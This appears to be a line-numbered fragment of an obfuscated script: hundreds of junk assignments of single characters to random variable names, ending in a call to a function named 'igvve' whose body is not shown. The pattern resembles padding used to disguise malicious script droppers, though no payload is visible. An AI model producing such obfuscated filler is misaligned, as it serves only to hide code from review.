765 | vvniyxkd = "J"; | |
766 | vvniyxkd = "l"; | |
767 | vvniyxkd = "Z"; | |
768 | vvniyxkd = "T"; | |
769 | vvniyxkd = "Z"; | |
770 | vvniyxkd = "s"; | |
771 | vvniyxkd = "v"; | |
772 | kqzqhfn = "C"; | |
773 | kqzqhfn = "B"; | |
774 | kqzqhfn = "n"; | |
775 | kqzqhfn = "S"; | |
776 | kqzqhfn = "r"; | |
777 | kqzqhfn = "E"; | |
778 | kqzqhfn = "h"; | |
779 | kqzqhfn = "g"; | |
780 | kqzqhfn = "A"; | |
781 | kqzqhfn = "k"; | |
782 | kqzqhfn = "W"; | |
783 | kqzqhfn = "Q"; | |
784 | kqzqhfn = "G"; | |
785 | kqzqhfn = "s"; | |
786 | kqzqhfn = "r"; | |
787 | gxxqzf = "D"; | |
788 | gxxqzf = "T"; | |
789 | gxxqzf = "a"; | |
790 | gxxqzf = "S"; | |
791 | gxxqzf = "X"; | |
792 | gxxqzf = "c"; | |
793 | gxxqzf = "f"; | |
794 | gxxqzf = "f"; | |
795 | gxxqzf = "n"; | |
796 | gxxqzf = "Q"; | |
797 | gxxqzf = "q"; | |
798 | gxxqzf = "S"; | |
799 | gxxqzf = "d"; | |
800 | pponzgjyx = "k"; | |
801 | pponzgjyx = "V"; | |
802 | pponzgjyx = "j"; | |
803 | pponzgjyx = "h"; | |
804 | pponzgjyx = "d"; | |
805 | pponzgjyx = "i"; | |
806 | pponzgjyx = "Y"; | |
807 | pponzgjyx = "c"; | |
808 | pponzgjyx = "s"; | |
809 | pponzgjyx = "o"; | |
810 | pponzgjyx = "M"; | |
811 | pponzgjyx = "X"; | |
812 | pponzgjyx = "R"; | |
813 | pponzgjyx = "j"; | |
814 | pponzgjyx = "a"; | |
815 | pponzgjyx = "U"; | |
816 | pponzgjyx = "k"; | |
817 | pponzgjyx = "O"; | |
818 | pponzgjyx = "l"; | |
819 | pponzgjyx = "f"; | |
820 | pponzgjyx = "y"; | |
821 | pponzgjyx = "W"; | |
822 | pponzgjyx = "h"; | |
823 | pponzgjyx = "p"; | |
824 | pponzgjyx = "p"; | |
825 | pponzgjyx = "f"; | |
826 | pponzgjyx = "W"; | |
827 | pponzgjyx = "U"; | |
828 | pponzgjyx = "s"; | |
829 | pponzgjyx = "Y"; | |
830 | pponzgjyx = "s"; | |
831 | pponzgjyx = "D"; | |
832 | pponzgjyx = "U"; | |
833 | pponzgjyx = "e"; | |
834 | pponzgjyx = "V"; | |
835 | pponzgjyx = "I"; | |
836 | pponzgjyx = "L"; | |
837 | pponzgjyx = "U"; | |
838 | pponzgjyx = "H"; | |
839 | pponzgjyx = "5"; | |
840 | rnnit = "v"; | |
841 | rnnit = "F"; | |
842 | rnnit = "S"; | |
843 | rnnit = "C"; | |
844 | rnnit = "J"; | |
845 | rnnit = "V"; | |
846 | rnnit = "J"; | |
847 | rnnit = "B"; | |
848 | rnnit = "Q"; | |
849 | rnnit = "f"; | |
850 | rnnit = "K"; | |
851 | rnnit = "n"; | |
852 | rnnit = "h"; | |
853 | rnnit = "o"; | |
854 | rnnit = "X"; | |
855 | rnnit = "L"; | |
856 | rnnit = "i"; | |
857 | rnnit = "T"; | |
858 | rnnit = "Q"; | |
859 | rnnit = "o"; | |
860 | rnnit = "C"; | |
861 | rnnit = "x"; | |
862 | rnnit = "Y"; | |
863 | rnnit = "D"; | |
864 | rnnit = "f"; | |
865 | rnnit = "R"; | |
866 | rnnit = "R"; | |
867 | tawfbvn = "C"; | |
868 | tawfbvn = "h"; | |
869 | tawfbvn = "u"; | |
870 | tawfbvn = "Y"; | |
871 | tawfbvn = "Y"; | |
872 | tawfbvn = "D"; | |
873 | tawfbvn = "A"; | |
874 | tawfbvn = "g"; | |
875 | tawfbvn = "L"; | |
876 | tawfbvn = "M"; | |
877 | tawfbvn = "w"; | |
878 | tawfbvn = "Y"; | |
879 | tawfbvn = "s"; | |
880 | tawfbvn = "r"; | |
881 | tawfbvn = "V"; | |
882 | tawfbvn = "p"; | |
883 | tawfbvn = "v"; | |
884 | tawfbvn = "d"; | |
885 | tawfbvn = "4"; | |
886 | vovebhiip = "q"; | |
887 | vovebhiip = "v"; | |
888 | vovebhiip = "V"; | |
889 | vovebhiip = "r"; | |
890 | vovebhiip = "Y"; | |
891 | vovebhiip = "b"; | |
892 | vovebhiip = "A"; | |
893 | vovebhiip = "c"; | |
894 | vovebhiip = "I"; | |
895 | vovebhiip = "q"; | |
896 | vovebhiip = "z"; | |
897 | vovebhiip = "q"; | |
898 | vovebhiip = "i"; | |
899 | vovebhiip = "O"; | |
900 | vovebhiip = "Z"; | |
901 | vovebhiip = "W"; | |
902 | vovebhiip = "a"; | |
903 | vovebhiip = "W"; | |
904 | vovebhiip = "H"; | |
905 | vovebhiip = "u"; | |
906 | vovebhiip = "H"; | |
907 | vovebhiip = "B"; | |
908 | vovebhiip = "D"; | |
909 | vovebhiip = "t"; | |
910 | vovebhiip = "q"; | |
911 | vovebhiip = "j"; | |
912 | vovebhiip = "M"; | |
913 | vovebhiip = "X"; | |
914 | vovebhiip = "I"; | |
915 | vovebhiip = "i"; | |
916 | vovebhiip = "O"; | |
917 | vovebhiip = "q"; | |
918 | vovebhiip = "&"; | |
919 | nyxnkrrw = "B"; | |
920 | nyxnkrrw = "V"; | |
921 | nyxnkrrw = "L"; | |
922 | nyxnkrrw = "k"; | |
923 | nyxnkrrw = "X"; | |
924 | nyxnkrrw = "t"; | |
925 | nyxnkrrw = "l"; | |
926 | nyxnkrrw = "c"; | |
927 | nyxnkrrw = "r"; | |
928 | nyxnkrrw = "L"; | |
929 | nyxnkrrw = "\\"; | |
930 | ykkkdahlm = "i"; | |
931 | ykkkdahlm = "X"; | |
932 | ykkkdahlm = "o"; | |
933 | ykkkdahlm = "E"; | |
934 | ykkkdahlm = "d"; | |
935 | ykkkdahlm = "s"; | |
936 | ykkkdahlm = "X"; | |
937 | ykkkdahlm = "W"; | |
938 | ykkkdahlm = "w"; | |
939 | ykkkdahlm = "Y"; | |
940 | ykkkdahlm = "c"; | |
941 | ykkkdahlm = "r"; | |
942 | ykkkdahlm = "R"; | |
943 | ykkkdahlm = "y"; | |
944 | ykkkdahlm = "U"; | |
945 | ykkkdahlm = "o"; | |
946 | ykkkdahlm = "p"; | |
947 | ykkkdahlm = "Q"; | |
948 | ykkkdahlm = "y"; | |
949 | ykkkdahlm = "o"; | |
950 | ykkkdahlm = "c"; | |
951 | ykkkdahlm = "P"; | |
952 | ykkkdahlm = "m"; | |
953 | ykkkdahlm = "o"; | |
954 | ykkkdahlm = "v"; | |
955 | ykkkdahlm = "Z"; | |
956 | ykkkdahlm = "g"; | |
957 | ykkkdahlm = "I"; | |
958 | ykkkdahlm = "F"; | |
959 | ykkkdahlm = "L"; | |
960 | ykkkdahlm = "b"; | |
961 | ykkkdahlm = "s"; | |
962 | ykkkdahlm = "C"; | |
963 | ykkkdahlm = "b"; | |
964 | asfap = "H"; | |
965 | asfap = "v"; | |
966 | asfap = "s"; | |
967 | asfap = "W"; | |
968 | asfap = "e"; | |
969 | asfap = "R"; | |
970 | asfap = "C"; | |
971 | asfap = "k"; | |
972 | asfap = "p"; | |
973 | asfap = "E"; | |
974 | asfap = "v"; | |
975 | asfap = "K"; | |
976 | cigcycte = "B"; | |
977 | cigcycte = "H"; | |
978 | cigcycte = "H"; | |
979 | cigcycte = "j"; | |
980 | cigcycte = "A"; | |
981 | cigcycte = "q"; | |
982 | cigcycte = "o"; | |
983 | cigcycte = "T"; | |
984 | cigcycte = "t"; | |
985 | cigcycte = "b"; | |
986 | cigcycte = "R"; | |
987 | cigcycte = "b"; | |
988 | cigcycte = "g"; | |
989 | cigcycte = "m"; | |
990 | cigcycte = "N"; | |
991 | cigcycte = "O"; | |
992 | cigcycte = "D"; | |
993 | cigcycte = "N"; | |
994 | cigcycte = "p"; | |
995 | cigcycte = "V"; | |
996 | cigcycte = "F"; | |
997 | cigcycte = "v"; | |
998 | cigcycte = "z"; | |
999 | cigcycte = "E"; | |
1000 | cigcycte = "q"; | |
1001 | cigcycte = "r"; | |
1002 | cigcycte = "w"; | |
1003 | cigcycte = "q"; | |
1004 | cigcycte = "u"; | |
1005 | cigcycte = "c"; | |
1006 | zipmy = "D"; | |
1007 | zipmy = "A"; | |
1008 | zipmy = "i"; | |
1009 | zipmy = "O"; | |
1010 | zipmy = "y"; | |
1011 | zipmy = "Q"; | |
1012 | zipmy = "b"; | |
1013 | zipmy = "Z"; | |
1014 | zipmy = "h"; | |
1015 | zipmy = "P"; | |
1016 | zipmy = "B"; | |
1017 | zipmy = "r"; | |
1018 | zipmy = "t"; | |
1019 | zipmy = "B"; | |
1020 | zipmy = "J"; | |
1021 | zipmy = "s"; | |
1022 | zipmy = "e"; | |
1023 | zipmy = "A"; | |
1024 | zipmy = "A"; | |
1025 | zipmy = "d"; | |
1026 | zipmy = "y"; | |
1027 | zipmy = "W"; | |
1028 | zipmy = "I"; | |
1029 | ulfqm = "v"; | |
1030 | ulfqm = "K"; | |
1031 | ulfqm = "N"; | |
1032 | ulfqm = "Q"; | |
1033 | ulfqm = "V"; | |
1034 | ulfqm = "U"; | |
1035 | ulfqm = "B"; | |
1036 | ulfqm = "l"; | |
1037 | ulfqm = "l"; | |
1038 | ulfqm = "z"; | |
1039 | ulfqm = "Z"; | |
1040 | ulfqm = "b"; | |
1041 | ulfqm = "K"; | |
1042 | ulfqm = "l"; | |
1043 | ulfqm = "@"; | |
1044 | ylsmmq = "g"; | |
1045 | ylsmmq = "Y"; | |
1046 | ylsmmq = "z"; | |
1047 | ylsmmq = "X"; | |
1048 | ylsmmq = "v"; | |
1049 | ylsmmq = "d"; | |
1050 | ylsmmq = "r"; | |
1051 | ylsmmq = "g"; | |
1052 | ylsmmq = "u"; | |
1053 | ylsmmq = "I"; | |
1054 | ylsmmq = "R"; | |
1055 | ylsmmq = "B"; | |
1056 | ylsmmq = "h"; | |
1057 | ylsmmq = "M"; | |
1058 | ylsmmq = "L"; | |
1059 | ylsmmq = "a"; | |
1060 | ylsmmq = "V"; | |
1061 | ylsmmq = "d"; | |
1062 | ylsmmq = "T"; | |
1063 | ylsmmq = "Y"; | |
1064 | ylsmmq = "S"; | |
1065 | ylsmmq = "v"; | |
1066 | ylsmmq = "S"; | |
1067 | ylsmmq = "f"; | |
1068 | ylsmmq = "h"; | |
1069 | ylsmmq = "w"; | |
1070 | ylsmmq = "k"; | |
1071 | losstjnh = "L"; | |
1072 | losstjnh = "v"; | |
1073 | losstjnh = "r"; | |
1074 | losstjnh = "O"; | |
1075 | losstjnh = "d"; | |
1076 | losstjnh = "b"; | |
1077 | losstjnh = "K"; | |
1078 | losstjnh = "o"; | |
1079 | losstjnh = "W"; | |
1080 | losstjnh = "O"; | |
1081 | losstjnh = "R"; | |
1082 | losstjnh = "p"; | |
1083 | epsrp = "S"; | |
1084 | epsrp = "S"; | |
1085 | epsrp = "m"; | |
1086 | epsrp = "e"; | |
1087 | epsrp = "Q"; | |
1088 | epsrp = "K"; | |
1089 | epsrp = "j"; | |
1090 | epsrp = "X"; | |
1091 | epsrp = "d"; | |
1092 | epsrp = "e"; | |
1093 | epsrp = "I"; | |
1094 | epsrp = "c"; | |
1095 | epsrp = "N"; | |
1096 | epsrp = "o"; | |
1097 | epsrp = "X"; | |
1098 | epsrp = "v"; | |
1099 | epsrp = "i"; | |
1100 | epsrp = "Y"; | |
1101 | epsrp = "y"; | |
1102 | epsrp = "E"; | |
1103 | epsrp = "m"; | |
1104 | epsrp = "L"; | |
1105 | epsrp = "l"; | |
1106 | epsrp = "D"; | |
1107 | epsrp = "a"; | |
1108 | epsrp = "B"; | |
1109 | epsrp = "C"; | |
1110 | epsrp = "i"; | |
1111 | epsrp = "y"; | |
1112 | epsrp = "C"; | |
1113 | epsrp = "P"; | |
1114 | epsrp = "B"; | |
1115 | epsrp = "V"; | |
1116 | epsrp = "f"; | |
1117 | epsrp = "H"; | |
1118 | epsrp = "m"; | |
1119 | epsrp = "o"; | |
1120 | epsrp = "T"; | |
1121 | epsrp = "K"; | |
1122 | epsrp = "_"; | |
1123 | rgpvebgza = "I"; | |
1124 | rgpvebgza = "T"; | |
1125 | rgpvebgza = "d"; | |
1126 | rgpvebgza = "j"; | |
1127 | rgpvebgza = "d"; | |
1128 | rgpvebgza = "Q"; | |
1129 | rgpvebgza = "P"; | |
1130 | rgpvebgza = "H"; | |
1131 | rgpvebgza = "d"; | |
1132 | rgpvebgza = "k"; | |
1133 | rgpvebgza = "q"; | |
1134 | rgpvebgza = "W"; | |
1135 | rgpvebgza = "P"; | |
1136 | rgpvebgza = "R"; | |
1137 | rgpvebgza = "k"; | |
1138 | rgpvebgza = "k"; | |
1139 | rgpvebgza = "H"; | |
1140 | rgpvebgza = "h"; | |
1141 | rgpvebgza = "A"; | |
1142 | rgpvebgza = "l"; | |
1143 | zzcnbzh = "A"; | |
1144 | zzcnbzh = "W"; | |
1145 | zzcnbzh = "T"; | |
1146 | zzcnbzh = "r"; | |
1147 | zzcnbzh = "s"; | |
1148 | zzcnbzh = "U"; | |
1149 | zzcnbzh = "u"; | |
1150 | zzcnbzh = "c"; | |
1151 | zzcnbzh = "A"; | |
1152 | zzcnbzh = "m"; | |
1153 | zzcnbzh = "c"; | |
1154 | zzcnbzh = "T"; | |
1155 | zzcnbzh = "S"; | |
1156 | zzcnbzh = "C"; | |
1157 | zzcnbzh = "S"; | |
1158 | zzcnbzh = "b"; | |
1159 | zzcnbzh = "a"; | |
1160 | zzcnbzh = "E"; | |
1161 | zzcnbzh = "3"; | |
1162 | wgbfrd = "E"; | |
1163 | wgbfrd = "s"; | |
1164 | wgbfrd = "f"; | |
1165 | wgbfrd = "F"; | |
1166 | wgbfrd = "q"; | |
1167 | wgbfrd = "S"; | |
1168 | wgbfrd = "d"; | |
1169 | wgbfrd = "F"; | |
1170 | wgbfrd = "B"; | |
1171 | wgbfrd = "I"; | |
1172 | wgbfrd = "v"; | |
1173 | wgbfrd = "t"; | |
1174 | wgbfrd = "/"; | |
1175 | jdzsokh = "I"; | |
1176 | jdzsokh = "H"; | |
1177 | jdzsokh = "T"; | |
1178 | jdzsokh = "I"; | |
1179 | jdzsokh = "B"; | |
1180 | jdzsokh = "V"; | |
1181 | jdzsokh = "I"; | |
1182 | jdzsokh = "f"; | |
1183 | jdzsokh = "k"; | |
1184 | jdzsokh = "I"; | |
1185 | jdzsokh = "Q"; | |
1186 | jdzsokh = "t"; | |
1187 | jdzsokh = "H"; | |
1188 | jdzsokh = "h"; | |
1189 | jdzsokh = "k"; | |
1190 | jdzsokh = "G"; | |
1191 | jdzsokh = "H"; | |
1192 | jdzsokh = "e"; | |
1193 | jdzsokh = "A"; | |
1194 | jdzsokh = "n"; | |
1195 | jdzsokh = "F"; | |
1196 | jdzsokh = "p"; | |
1197 | jdzsokh = "M"; | |
1198 | jdzsokh = "o"; | |
1199 | jdzsokh = "G"; | |
1200 | jdzsokh = "1"; | |
1201 | lxmzify = "z"; | |
1202 | lxmzify = "t"; | |
1203 | lxmzify = "q"; | |
1204 | lxmzify = "q"; | |
1205 | lxmzify = "u"; | |
1206 | lxmzify = "j"; | |
1207 | lxmzify = "c"; | |
1208 | lxmzify = "K"; | |
1209 | lxmzify = "k"; | |
1210 | lxmzify = "n"; | |
1211 | lxmzify = "a"; | |
1212 | lxmzify = "d"; | |
1213 | lxmzify = "g"; | |
1214 | lxmzify = "T"; | |
1215 | lxmzify = "u"; | |
1216 | lxmzify = "r"; | |
1217 | lxmzify = "R"; | |
1218 | lxmzify = "t"; | |
1219 | aawooskv = "C"; | |
1220 | aawooskv = "N"; | |
1221 | aawooskv = "V"; | |
1222 | aawooskv = "R"; | |
1223 | aawooskv = "h"; | |
1224 | aawooskv = "y"; | |
1225 | aawooskv = "A"; | |
1226 | aawooskv = "X"; | |
1227 | aawooskv = "o"; | |
1228 | aawooskv = "T"; | |
1229 | aawooskv = "Z"; | |
1230 | aawooskv = "I"; | |
1231 | aawooskv = "b"; | |
1232 | aawooskv = "T"; | |
1233 | aawooskv = "s"; | |
1234 | aawooskv = "k"; | |
1235 | aawooskv = "j"; | |
1236 | aawooskv = "W"; | |
1237 | aawooskv = "Q"; | |
1238 | aawooskv = "r"; | |
1239 | aawooskv = "F"; | |
1240 | aawooskv = "E"; | |
1241 | aawooskv = "I"; | |
1242 | aawooskv = "y"; | |
1243 | aawooskv = "X"; | |
1244 | aawooskv = "B"; | |
1245 | aawooskv = "y"; | |
1246 | aawooskv = "E"; | |
1247 | aawooskv = "B"; | |
1248 | aawooskv = "B"; | |
1249 | aawooskv = "E"; | |
1250 | aawooskv = "b"; | |
1251 | aawooskv = "A"; | |
1252 | aawooskv = "-"; | |
1253 | nscijyz = "v"; | |
1254 | nscijyz = "M"; | |
1255 | nscijyz = "y"; | |
1256 | nscijyz = "f"; | |
1257 | xcpnzy = "w"; | |
1258 | xcpnzy = "y"; | |
1259 | xcpnzy = "D"; | |
1260 | xcpnzy = "Y"; | |
1261 | xcpnzy = "J"; | |
1262 | xcpnzy = "k"; | |
1263 | xcpnzy = "2"; | |
1264 | wqwpwcwz = "i"; | |
1265 | wqwpwcwz = "X"; | |
1266 | wqwpwcwz = "L"; | |
1267 | wqwpwcwz = "q"; | |
1268 | wqwpwcwz = "I"; | |
1269 | wqwpwcwz = "p"; | |
1270 | wqwpwcwz = "G"; | |
1271 | wqwpwcwz = "C"; | |
1272 | wqwpwcwz = "C"; | |
1273 | wqwpwcwz = "r"; | |
1274 | wqwpwcwz = "z"; | |
1275 | wqwpwcwz = "L"; | |
1276 | wqwpwcwz = "h"; | |
1277 | wqwpwcwz = "b"; | |
1278 | wqwpwcwz = "u"; | |
1279 | wqwpwcwz = "e"; | |
1280 | wqwpwcwz = "x"; | |
1281 | wqwpwcwz = "w"; | |
1282 | wqwpwcwz = "a"; | |
1283 | wqwpwcwz = "O"; | |
1284 | wqwpwcwz = "q"; | |
1285 | wqwpwcwz = "W"; | |
1286 | wqwpwcwz = "b"; | |
1287 | wqwpwcwz = "Y"; | |
1288 | wqwpwcwz = "V"; | |
1289 | wqwpwcwz = "h"; | |
1290 | wqwpwcwz = "P"; | |
1291 | wqwpwcwz = "i"; | |
1292 | wqwpwcwz = "d"; | |
1293 | wqwpwcwz = "L"; | |
1294 | wqwpwcwz = "H"; | |
1295 | wqwpwcwz = "b"; | |
1296 | wqwpwcwz = "P"; | |
1297 | wqwpwcwz = "y"; | |
1298 | wqwpwcwz = "v"; | |
1299 | wqwpwcwz = "R"; | |
1300 | wqwpwcwz = "U"; | |
1301 | wqwpwcwz = "Y"; | |
1302 | wqwpwcwz = "e"; | |
1303 | wqwpwcwz = "y"; | |
1304 | wqwpwcwz = "K"; | |
1305 | wqwpwcwz = "K"; | |
1306 | wqwpwcwz = "C"; | |
1307 | edglu = "p"; | |
1308 | edglu = "y"; | |
1309 | edglu = "i"; | |
1310 | edglu = "U"; | |
1311 | edglu = "v"; | |
1312 | edglu = "l"; | |
1313 | edglu = "M"; | |
1314 | edglu = "U"; | |
1315 | edglu = "I"; | |
1316 | edglu = "y"; | |
1317 | edglu = "q"; | |
1318 | edglu = "n"; | |
1319 | edglu = "J"; | |
1320 | edglu = "C"; | |
1321 | edglu = "L"; | |
1322 | edglu = "d"; | |
1323 | edglu = "J"; | |
1324 | edglu = "s"; | |
1325 | edglu = "j"; | |
1326 | edglu = "Q"; | |
1327 | edglu = "E"; | |
1328 | edglu = "k"; | |
1329 | edglu = "G"; | |
1330 | edglu = "B"; | |
1331 | edglu = "B"; | |
1332 | edglu = "p"; | |
1333 | edglu = "C"; | |
1334 | edglu = "s"; | |
1335 | edglu = "B"; | |
1336 | edglu = "R"; | |
1337 | edglu = "t"; | |
1338 | edglu = "n"; | |
1339 | edglu = "u"; | |
1340 | edglu = "P"; | |
1341 | edglu = "X"; | |
1342 | edglu = "H"; | |
1343 | edglu = "o"; | |
1344 | edglu = "K"; | |
1345 | edglu = "a"; | |
1346 | edglu = "N"; | |
1347 | uourjwb = "L"; | |
1348 | uourjwb = "L"; | |
1349 | uourjwb = "I"; | |
1350 | uourjwb = "j"; | |
1351 | uourjwb = "z"; | |
1352 | uourjwb = "H"; | |
1353 | uourjwb = "P"; | |
1354 | uourjwb = "n"; | |
1355 | uourjwb = "m"; | |
1356 | uourjwb = "Z"; | |
1357 | uourjwb = "P"; | |
1358 | uourjwb = "d"; | |
1359 | uourjwb = "o"; | |
1360 | uourjwb = "K"; | |
1361 | uourjwb = "b"; | |
1362 | uourjwb = "Q"; | |
1363 | uourjwb = "i"; | |
1364 | uourjwb = "n"; | |
1365 | uourjwb = "n"; | |
1366 | uourjwb = "M"; | |
1367 | uourjwb = "G"; | |
1368 | uourjwb = "Y"; | |
1369 | igvve ( ); |
|